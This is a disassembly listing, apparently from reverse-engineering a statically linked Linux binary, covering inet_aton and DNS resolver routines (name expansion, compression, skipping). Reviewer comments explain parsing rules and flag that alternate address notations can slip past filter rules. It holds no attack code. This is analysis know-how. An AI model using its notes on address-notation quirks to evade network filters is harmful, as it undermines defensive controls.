lea esi, [edi+ecx*4] mov edx, [ebp+var_54] lea ebx, [edx+ecx*2] lea esi, [esi] loc_804CDEC: ; CODE XREF: sub_804CBE4+23Dj mov ax, [ebp+ecx*2+var_48] cmp [ebx], ax jge short loc_804CE23 movsx edi, ax mov [ebp+var_5C], edi mov ax, [ebx] mov [ebp+ecx*2+var_48], ax mov dx, word ptr [ebp+var_5C] mov [ebx], dx mov edi, [esi] mov edx, [ebp+arg_0] mov eax, [edx+ecx*4+4] mov [esi], eax mov [edx+ecx*4+4], edi add esi, 0FFFFFFFCh add ebx, 0FFFFFFFEh dec ecx jns short loc_804CDEC loc_804CE23: ; CODE XREF: sub_804CBE4+1F8j ; sub_804CBE4+210j mov ecx, [ebp+var_50] test ecx, ecx jl short loc_804CE6F mov edi, [ebp+arg_0] lea esi, [edi+ecx*4] mov edx, [ebp+var_54] lea ebx, [edx+ecx*2] lea esi, [esi] loc_804CE38: ; CODE XREF: sub_804CBE4+289j mov ax, [ebp+ecx*2+var_48] cmp [ebx], ax jge short loc_804CE6F movsx edi, ax mov 
[ebp+var_5C], edi mov ax, [ebx] mov [ebp+ecx*2+var_48], ax mov dx, word ptr [ebp+var_5C] mov [ebx], dx mov edi, [esi] mov edx, [ebp+arg_0] mov eax, [edx+ecx*4+4] mov [esi], eax mov [edx+ecx*4+4], edi add esi, 0FFFFFFFCh add ebx, 0FFFFFFFEh dec ecx jns short loc_804CE38 loc_804CE6F: ; CODE XREF: sub_804CBE4+244j ; sub_804CBE4+25Cj add [ebp+var_50], 2 mov edi, [ebp+arg_4] cmp [ebp+var_50], edi jl loc_804CDD8 loc_804CE7F: ; CODE XREF: sub_804CBE4+17Cj ; sub_804CBE4+188j ... lea esp, [ebp+var_6C] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_804CBE4 endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 3 dup(90h) ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden inet_addr proc near ; CODE XREF: sub_8049564+1B1p ; sub_80499F4+BFp ... var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 4 mov edx, [ebp+arg_0] lea eax, [ebp+var_4] push eax push edx call inet_aton test eax, eax jnz short loc_804CEAC mov eax, 0FFFFFFFFh mov esp, ebp pop ebp retn ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804CEAC: ; CODE XREF: inet_addr+15j mov eax, [ebp+var_4] mov esp, ebp pop ebp retn inet_addr endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden inet_aton proc near ; CODE XREF: inet_addr+Ep ; res_init+415p ... 
; inet_aton(arg_0 = address text, arg_4 = optional result pointer): locals and
; body (the proc line precedes this point). Returns 1 on success, 0 on a
; malformed string.
;   ebx     cursor into the text
;   esi     value of the component being parsed
;   var_14  numeric base of the current component (0Ah, 10h or 8)
;   var_18  next free slot in the parts array var_10 / var_C / var_8
;   edi     character-class table from dword_8078FA0; the flag bits used here
;           (08h digit, 10h hex digit, 02h lower case, 20h whitespace) are
;           inferred from how they are tested -- confirm against the libc
; Parsing rules visible in the code:
;   * a leading "0x"/"0X" selects base 16, any other leading "0" selects base 8
;   * a digit is accumulated as esi*base + digit with no check that the digit
;     is below the base and no overflow check on esi
;   * 1 to 4 dot-separated parts are accepted; the last part fills all the
;     remaining low-order bytes (limits 0FFFFFFh, 0FFFFh, 0FFh for 2, 3 and 4
;     parts; a single part is not range-checked)
; NOTE(review): because hex, octal and short forms all produce an ordinary
; IPv4 value, address text recovered from this binary's inputs should be
; normalised to a canonical dotted quad before it is compared with indicators
; or filter rules.
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        sub esp, 1Ch
        push edi
        push esi
        push ebx
        mov ebx, [ebp+arg_0]            ; ebx = text cursor
        lea ecx, [ebp+var_10]
        mov [ebp+var_18], ecx           ; parts pointer = first slot
        lea esi, [esi]                  ; padding, no effect

loc_804CEC8:                            ; CODE XREF: inet_aton+CBj
        xor esi, esi                    ; new component: value = 0
        mov [ebp+var_14], 0Ah           ; default base 10
        cmp byte ptr [ebx], 30h         ; leading '0'?
        jnz short loc_804CEF3
        inc ebx
        cmp byte ptr [ebx], 78h         ; 'x'
        jz short loc_804CEE1
        cmp byte ptr [ebx], 58h         ; 'X'
        jnz short loc_804CEEC

loc_804CEE1:                            ; CODE XREF: inet_aton+26j
        mov [ebp+var_14], 10h           ; "0x" prefix: base 16
        inc ebx
        jmp short loc_804CEF3
; ---------------------------------------------------------------------------
        align 4

loc_804CEEC:                            ; CODE XREF: inet_aton+2Bj
        mov [ebp+var_14], 8             ; bare leading '0': base 8

loc_804CEF3:                            ; CODE XREF: inet_aton+20j
                                        ; inet_aton+35j
        mov al, [ebx]
        test al, al
        jz short loc_804CF5A            ; end of string
        mov edi, dword_8078FA0          ; character-class table
        nop

loc_804CF00:                            ; CODE XREF: inet_aton+A4j
        test al, al
        jl short loc_804CF1C            ; bytes >= 80h are never digits
        movzx edx, al
        test byte ptr [edi+edx*2+1], 8  ; digit class?
        jz short loc_804CF1C
        mov eax, [ebp+var_14]
        imul eax, esi
        lea esi, [edx+eax-30h]          ; esi = esi*base + (c - '0')
        jmp short loc_804CF53
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_804CF1C:                            ; CODE XREF: inet_aton+4Ej
                                        ; inet_aton+58j
        cmp [ebp+var_14], 10h           ; letters only count in base 16
        jnz short loc_804CF5A
        test al, al
        jl short loc_804CF5A
        and eax, 0FFh
        test byte ptr [edi+eax*2+1], 10h ; hex-digit class?
        jz short loc_804CF5A
        lea ecx, [eax+0Ah]              ; c + 10
        mov [ebp+var_1C], ecx
        mov edx, esi
        shl edx, 4                      ; esi * 16
        test byte ptr [edi+eax*2+1], 2  ; lower-case class?
        jz short loc_804CF4C
        lea esi, [ecx+edx-61h]          ; esi = esi*16 + c + 10 - 'a'
        jmp short loc_804CF53
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_804CF4C:                            ; CODE XREF: inet_aton+8Ej
        mov ecx, [ebp+var_1C]
        lea esi, [ecx+edx-41h]          ; esi = esi*16 + c + 10 - 'A'

loc_804CF53:                            ; CODE XREF: inet_aton+64j
                                        ; inet_aton+94j
        inc ebx
        mov al, [ebx]
        test al, al
        jnz short loc_804CF00

loc_804CF5A:                            ; CODE XREF: inet_aton+43j
                                        ; inet_aton+6Cj ...
        cmp byte ptr [ebx], 2Eh         ; '.' ends a non-final component
        jnz short loc_804CF84
        lea eax, [ebp+var_4]
        cmp [ebp+var_18], eax           ; all three slots already used?
        jnb loc_804CFEC
        cmp esi, 0FFh                   ; a non-final part must fit in one byte
        ja short loc_804CFEC
        mov ecx, [ebp+var_18]
        mov [ecx], esi                  ; store the part
        add ecx, 4
        mov [ebp+var_18], ecx
        inc ebx
        jmp loc_804CEC8                 ; parse the next component
; ---------------------------------------------------------------------------

loc_804CF84:                            ; CODE XREF: inet_aton+A9j
        cmp byte ptr [ebx], 0           ; the text must end in NUL ...
        jz short loc_804CF9A
        jl short loc_804CFEC
        movzx edx, byte ptr [ebx]
        mov eax, dword_8078FA0
        test byte ptr [eax+edx*2+1], 20h ; ... or a character with flag 20h
        jz short loc_804CFEC

loc_804CF9A:                            ; CODE XREF: inet_aton+D3j
        lea eax, [ebp+var_10]
        mov ecx, [ebp+var_18]
        sub ecx, eax
        mov eax, ecx
        sar eax, 2
        inc eax                         ; eax = number of parts (stored + last)
        cmp eax, 2
        jz short loc_804CFBC
        jle short loc_804D008           ; one part: esi is used as it stands
        cmp eax, 3
        jz short loc_804CFCC
        cmp eax, 4
        jz short loc_804CFE4
        jmp short loc_804D008
; ---------------------------------------------------------------------------
        align 4

loc_804CFBC:                            ; CODE XREF: inet_aton+F7j
        cmp esi, 0FFFFFFh               ; two parts: the last one is 24 bits
        ja short loc_804CFEC
        mov eax, [ebp+var_10]
        shl eax, 18h
        jmp short loc_804D006
; ---------------------------------------------------------------------------

loc_804CFCC:                            ; CODE XREF: inet_aton+FEj
        cmp esi, 0FFFFh                 ; three parts: the last one is 16 bits
        ja short loc_804CFEC
        mov eax, [ebp+var_10]
        shl eax, 18h
        mov edx, [ebp+var_C]
        shl edx, 10h
        jmp short loc_804D004
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_804CFE4:                            ; CODE XREF: inet_aton+103j
        cmp esi, 0FFh                   ; four parts: the last one is 8 bits
        jbe short loc_804CFF0

loc_804CFEC:                            ; CODE XREF: inet_aton+B1j
                                        ; inet_aton+BDj ...
        xor eax, eax                    ; malformed input: return 0
        jmp short loc_804D021
; ---------------------------------------------------------------------------

loc_804CFF0:                            ; CODE XREF: inet_aton+136j
        mov eax, [ebp+var_10]
        shl eax, 18h
        mov edx, [ebp+var_C]
        shl edx, 10h
        or eax, edx
        mov edx, [ebp+var_8]
        shl edx, 8

loc_804D004:                            ; CODE XREF: inet_aton+12Cj
        or eax, edx

loc_804D006:                            ; CODE XREF: inet_aton+116j
        or esi, eax                     ; esi = assembled 32-bit address

loc_804D008:                            ; CODE XREF: inet_aton+F9j
                                        ; inet_aton+105j
        cmp [ebp+arg_4], 0              ; result pointer is optional
        jz short loc_804D01C
        mov eax, esi
        xchg al, ah                     ; these three instructions reverse the
        ror eax, 10h                    ; byte order of eax before the store
        xchg al, ah
        mov ecx, [ebp+arg_4]
        mov [ecx], eax

loc_804D01C:                            ; CODE XREF: inet_aton+158j
        mov eax, 1                      ; success

loc_804D021:                            ; CODE XREF: inet_aton+13Aj
        lea esp, [ebp+var_28]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
inet_aton endp

; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; sub_804D02C(arg_0, arg_4, arg_8, arg_C, arg_10): start of a routine that
; walks a length-prefixed name at arg_8 and writes dotted text into the buffer
; arg_C of arg_10 bytes. The routine continues past the end of this excerpt.
;   var_C   = arg_C + arg_10, the output limit checked before each store
;   var_8   running count of input bytes consumed
;   var_4   starts at -1
; Each length byte is classified by its top two bits: 00 is a plain label,
; C0h branches to loc_804D210, anything else goes to loc_804D24A.
; NOTE(review): the argument order and the 0C0h test match the resolver's
; dn_expand(msg, eomorig, comp_dn, exp_dn, length), and the caller in the XREF
; is getanswer -- confirm before renaming.
; Attributes: bp-based frame hidden
sub_804D02C proc near                   ; CODE XREF: getanswer+9Ap
                                        ; getanswer+18Ap ...
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
        push ebp
        mov ebp, esp
        sub esp, 0Ch
        push edi
        push esi
        push ebx
        mov [ebp+var_4], 0FFFFFFFFh
        mov [ebp+var_8], 0
        mov ecx, [ebp+arg_C]            ; ecx = output cursor
        mov edi, ecx
        add edi, [ebp+arg_10]
        mov [ebp+var_C], edi            ; output limit
        mov edi, [ebp+arg_8]
        movzx esi, byte ptr [edi]       ; first length byte
        mov ebx, edi                    ; ebx = input cursor
        jmp loc_804D257
; ---------------------------------------------------------------------------
        align 4

loc_804D05C:                            ; CODE XREF: sub_804D02C+22Ej
        mov eax, esi
        and eax, 0C0h                   ; classify by the top two bits
        jz short loc_804D078            ; 00: ordinary label
        cmp eax, 0C0h
        jz loc_804D210                  ; 11: handled at loc_804D210
        jmp loc_804D24A                 ; 01 / 10: handled at loc_804D24A
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_804D078:                            ; CODE XREF: sub_804D02C+37j
        cmp [ebp+arg_C], ecx            ; first label needs no separator
        jz short loc_804D08A
        cmp [ebp+var_C], ecx            ; room for the separator?
        jbe loc_804D24A
        mov byte ptr [ecx], 2Eh         ; write '.'
        inc ecx

loc_804D08A:                            ; CODE XREF: sub_804D02C+4Fj
        lea eax, [esi+ecx]
        cmp [ebp+var_C], eax            ; whole label must fit in the output
        jbe loc_804D24A
        mov edi, [ebp+var_8]
        lea edi, [esi+edi+1]
        mov [ebp+var_8], edi            ; consumed += label length + 1
        dec esi
        js loc_804D254                  ; nothing to copy
        mov eax, esi
        not eax
and eax, 3 cmp esi, 0FFFFFFFFh jle short loc_804D121 test eax, eax jz loc_804D155 cmp eax, 3 jge short loc_804D121 cmp eax, 2 jge short loc_804D0F3 movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D0D3 cmp edx, 5Ch jnz short loc_804D0E4 loc_804D0D3: ; CODE XREF: sub_804D02C+A0j lea eax, [esi+ecx+2] cmp [ebp+var_C], eax jbe loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D0E4: ; CODE XREF: sub_804D02C+A5j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe loc_804D24A dec esi loc_804D0F3: ; CODE XREF: sub_804D02C+97j movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D101 cmp edx, 5Ch jnz short loc_804D112 loc_804D101: ; CODE XREF: sub_804D02C+CEj lea eax, [esi+ecx+2] cmp [ebp+var_C], eax jbe loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D112: ; CODE XREF: sub_804D02C+D3j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe loc_804D24A dec esi loc_804D121: ; CODE XREF: sub_804D02C+85j ; sub_804D02C+92j movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D12F cmp edx, 5Ch jnz short loc_804D140 loc_804D12F: ; CODE XREF: sub_804D02C+FCj lea eax, [esi+ecx+2] cmp [ebp+var_C], eax jbe loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D140: ; CODE XREF: sub_804D02C+101j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe loc_804D24A dec esi js loc_804D254 loc_804D155: ; CODE XREF: sub_804D02C+89j db 8Dh,76h,0 ; lea esi, [esi+0] loc_804D158: ; CODE XREF: sub_804D02C+1DCj movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D166 cmp edx, 5Ch jnz short loc_804D177 loc_804D166: ; CODE XREF: sub_804D02C+133j lea eax, [esi+ecx+2] cmp [ebp+var_C], eax jbe loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D177: ; CODE XREF: sub_804D02C+138j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe loc_804D24A lea eax, [esi-1] movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D196 cmp edx, 5Ch jnz short loc_804D1A7 loc_804D196: ; CODE XREF: sub_804D02C+163j lea eax, [eax+ecx+2] cmp [ebp+var_C], 
eax jbe loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D1A7: ; CODE XREF: sub_804D02C+168j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe loc_804D24A lea eax, [esi-2] movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D1C6 cmp edx, 5Ch jnz short loc_804D1D3 loc_804D1C6: ; CODE XREF: sub_804D02C+193j lea eax, [eax+ecx+2] cmp [ebp+var_C], eax jbe short loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D1D3: ; CODE XREF: sub_804D02C+198j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe short loc_804D24A lea eax, [esi-3] movzx edx, byte ptr [ebx] inc ebx cmp edx, 2Eh jz short loc_804D1EE cmp edx, 5Ch jnz short loc_804D1FB loc_804D1EE: ; CODE XREF: sub_804D02C+1BBj lea eax, [eax+ecx+2] cmp [ebp+var_C], eax jbe short loc_804D24A mov byte ptr [ecx], 5Ch inc ecx loc_804D1FB: ; CODE XREF: sub_804D02C+1C0j mov al, dl mov [ecx], al inc ecx cmp [ebp+arg_4], ebx jbe short loc_804D24A add esi, 0FFFFFFFCh jns loc_804D158 jmp short loc_804D254 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D210: ; CODE XREF: sub_804D02C+3Ej cmp [ebp+var_4], 0 jge short loc_804D21F mov edi, ebx sub edi, [ebp+arg_8] inc edi mov [ebp+var_4], edi loc_804D21F: ; CODE XREF: sub_804D02C+1E8j mov eax, esi and eax, 3Fh shl eax, 8 movzx edx, byte ptr [ebx] or eax, edx mov ebx, [ebp+arg_0] add ebx, eax cmp [ebp+arg_0], ebx ja short loc_804D24A cmp [ebp+arg_4], ebx jbe short loc_804D24A add [ebp+var_8], 2 mov eax, [ebp+arg_4] sub eax, [ebp+arg_0] cmp [ebp+var_8], eax jl short loc_804D254 loc_804D24A: ; CODE XREF: sub_804D02C+44j ; sub_804D02C+54j ... mov eax, 0FFFFFFFFh jmp short loc_804D296 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D254: ; CODE XREF: sub_804D02C+75j ; sub_804D02C+123j ... 
movzx esi, byte ptr [ebx] loc_804D257: ; CODE XREF: sub_804D02C+2Aj inc ebx test esi, esi jnz loc_804D05C mov byte ptr [ecx], 0 mov ecx, [ebp+arg_C] movzx edx, byte ptr [ecx] test edx, edx jz short loc_804D287 mov eax, dword_8078FA0 lea esi, [esi] loc_804D274: ; CODE XREF: sub_804D02C+259j test dl, dl jl short loc_804D27F test byte ptr [eax+edx*2+1], 20h jnz short loc_804D24A loc_804D27F: ; CODE XREF: sub_804D02C+24Aj inc ecx movzx edx, byte ptr [ecx] test edx, edx jnz short loc_804D274 loc_804D287: ; CODE XREF: sub_804D02C+23Fj cmp [ebp+var_4], 0 jge short loc_804D293 sub ebx, [ebp+arg_8] mov [ebp+var_4], ebx loc_804D293: ; CODE XREF: sub_804D02C+25Fj mov eax, [ebp+var_4] loc_804D296: ; CODE XREF: sub_804D02C+223j lea esp, [ebp+var_18] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_804D02C endp ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804D2A0 proc near ; CODE XREF: sub_80608C8+F9p ; sub_80608C8+15Ap var_20 = byte ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 14h push edi push esi push ebx mov esi, [ebp+arg_0] mov edi, [ebp+arg_4] mov edx, edi add edx, [ebp+arg_8] mov [ebp+var_C], edx mov [ebp+var_4], 0 mov [ebp+var_8], 0 cmp [ebp+arg_C], 0 jz short loc_804D304 mov edx, [ebp+arg_C] mov edx, [edx] mov [ebp+var_10], edx add [ebp+arg_C], 4 test edx, edx jz short loc_804D30B mov edx, [ebp+arg_C] mov [ebp+var_4], edx cmp dword ptr [edx], 0 jz short loc_804D2F4 lea esi, [esi] loc_804D2E8: ; CODE XREF: sub_804D2A0+52j add [ebp+var_4], 4 mov edx, [ebp+var_4] cmp dword ptr [edx], 0 jnz short loc_804D2E8 loc_804D2F4: ; CODE XREF: sub_804D2A0+44j mov edx, [ebp+var_4] mov [ebp+var_8], edx jmp short loc_804D30B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D2FC: ; CODE XREF: sub_804D2A0+11Aj dec edi jmp 
loc_804D3D5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D304: ; CODE XREF: sub_804D2A0+29j mov [ebp+var_10], 0 loc_804D30B: ; CODE XREF: sub_804D2A0+39j ; sub_804D2A0+5Aj movzx ebx, byte ptr [esi] inc esi test ebx, ebx jz loc_804D3D5 nop loc_804D318: ; CODE XREF: sub_804D2A0+12Fj cmp [ebp+var_10], 0 jz short loc_804D382 mov edx, [ebp+var_8] push edx mov edx, [ebp+arg_C] push edx mov edx, [ebp+var_10] push edx lea eax, [esi-1] push eax call sub_804D484 mov ecx, eax add esp, 10h test ecx, ecx jl short loc_804D360 lea ebx, [edi+1] cmp [ebp+var_C], ebx jbe loc_804D3E9 sar eax, 8 or al, 0C0h mov [edi], al mov edi, ebx mov edx, edi inc edi mov al, cl mov [edx], al jmp loc_804D3F4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D360: ; CODE XREF: sub_804D2A0+9Aj cmp [ebp+arg_10], 0 jz short loc_804D382 mov eax, [ebp+arg_10] add eax, 0FFFFFFFCh cmp [ebp+var_4], eax jnb short loc_804D382 mov edx, [ebp+var_4] mov [edx], edi add edx, 4 mov [ebp+var_4], edx mov dword ptr [edx], 0 loc_804D382: ; CODE XREF: sub_804D2A0+7Cj ; sub_804D2A0+C4j ... 
mov [ebp+var_14], edi inc edi jmp short loc_804D3A7 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D388: ; CODE XREF: sub_804D2A0+10Aj cmp ebx, 5Ch jnz short loc_804D395 movzx ebx, byte ptr [esi] inc esi test ebx, ebx jz short loc_804D3B0 loc_804D395: ; CODE XREF: sub_804D2A0+EBj cmp [ebp+var_C], edi jbe short loc_804D3DA mov al, bl mov [edi], al inc edi movzx ebx, byte ptr [esi] inc esi test ebx, ebx jz short loc_804D3B0 loc_804D3A7: ; CODE XREF: sub_804D2A0+E6j cmp ebx, 2Eh jnz short loc_804D388 movzx ebx, byte ptr [esi] inc esi loc_804D3B0: ; CODE XREF: sub_804D2A0+F3j ; sub_804D2A0+105j mov ecx, edi sub ecx, [ebp+var_14] dec ecx jnz short loc_804D3C0 test ebx, ebx jz loc_804D2FC loc_804D3C0: ; CODE XREF: sub_804D2A0+116j lea eax, [ecx-1] cmp eax, 3Eh ja short loc_804D3DA mov edx, [ebp+var_14] mov [edx], cl test ebx, ebx jnz loc_804D318 loc_804D3D5: ; CODE XREF: sub_804D2A0+5Dj ; sub_804D2A0+71j cmp [ebp+var_C], edi ja short loc_804D3F0 loc_804D3DA: ; CODE XREF: sub_804D2A0+F8j ; sub_804D2A0+126j cmp [ebp+var_10], 0 jz short loc_804D3E9 mov edx, [ebp+var_8] mov dword ptr [edx], 0 loc_804D3E9: ; CODE XREF: sub_804D2A0+A2j ; sub_804D2A0+13Ej mov eax, 0FFFFFFFFh jmp short loc_804D3F9 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804D3F0: ; CODE XREF: sub_804D2A0+138j mov byte ptr [edi], 0 inc edi loc_804D3F4: ; CODE XREF: sub_804D2A0+B8j mov eax, edi sub eax, [ebp+arg_4] loc_804D3F9: ; CODE XREF: sub_804D2A0+14Ej lea esp, [ebp+var_20] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_804D2A0 endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_804D404 proc near ; CODE XREF: sub_805EFB0+88p ; sub_805EFB0+E0p ... 
; Body of sub_804D404 (its "proc near" line precedes this span).
;
; Walks a run of length-prefixed labels starting at arg_0 and never
; dereferences at or beyond arg_4:
;   - a 0 byte ends the walk;
;   - a byte whose top two bits are 00 is a length: that many bytes are skipped;
;   - a byte whose top two bits are 11 is followed by one more byte, then the
;     walk ends;
;   - any other top-bit pattern (01 / 10) is rejected.
; Returns the number of bytes consumed, or 0FFFFFFFFh (-1) on a rejected byte
; or when the cursor ended up past arg_4.
; NOTE(review): this is the shape of a DNS compressed-name skipper
; (__dn_skipname in the BIND resolver) -- library code, presumably statically
; linked; confirm against a libc signature set before renaming.
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push ebp
        mov ebp, esp
        push esi
        push ebx
        mov esi, [ebp+arg_0]            ; esi = start of the encoded name
        mov ebx, [ebp+arg_4]            ; ebx = end-of-buffer limit
        mov eax, esi                    ; eax = read cursor
        cmp esi, ebx
        jnb short loc_804D440           ; start already at/after the limit: nothing to read
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804D418:                            ; CODE XREF: sub_804D404+3Aj
        movzx edx, byte ptr [eax]       ; only reached while cursor < limit
        inc eax
        test edx, edx
        jz short loc_804D440            ; zero byte terminates the walk
        mov ecx, edx
        and ecx, 0C0h                   ; isolate the two top bits
        jz short loc_804D434            ; 00 -> plain length byte
        cmp ecx, 0C0h
        jz short loc_804D438            ; 11 -> two-byte form
        jmp short loc_804D448           ; 01 / 10 -> error
; ---------------------------------------------------------------------------
loc_804D434:                            ; CODE XREF: sub_804D404+24j
        add eax, edx                    ; skip the label body; may overshoot, checked below
        jmp short loc_804D43C
; ---------------------------------------------------------------------------
loc_804D438:                            ; CODE XREF: sub_804D404+2Cj
        inc eax                         ; consume the second byte and stop
        jmp short loc_804D440
; ---------------------------------------------------------------------------
        align 4
loc_804D43C:                            ; CODE XREF: sub_804D404+32j
        cmp eax, ebx
        jb short loc_804D418            ; keep going only while the cursor is inside the buffer
loc_804D440:                            ; CODE XREF: sub_804D404+Fj
                                        ; sub_804D404+1Aj ...
        cmp eax, ebx
        ja short loc_804D448            ; cursor ran past the limit -> error
        sub eax, esi                    ; return bytes consumed
        jmp short loc_804D44D
; ---------------------------------------------------------------------------
loc_804D448:                            ; CODE XREF: sub_804D404+2Ej
                                        ; sub_804D404+3Ej
        mov eax, 0FFFFFFFFh             ; -1
loc_804D44D:                            ; CODE XREF: sub_804D404+42j
        lea esp, [ebp+var_8]
        pop ebx
        pop esi
        mov esp, ebp
        pop ebp
        retn
sub_804D404 endp
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; sub_804D458: returns arg_0 unchanged when its low byte is >= 80h or when
; bit 0 of the byte at dword_8078FA0 + c*2 + 1 is clear; otherwise returns the
; dword at dword_8078FA4 + c*4.
; NOTE(review): looks like a ctype-table lower-casing helper (mklower in the
; BIND resolver) -- confirm what the two tables hold.
sub_804D458 proc near                   ; CODE XREF: sub_804D484+81p
                                        ; sub_804D484+8Ep ...
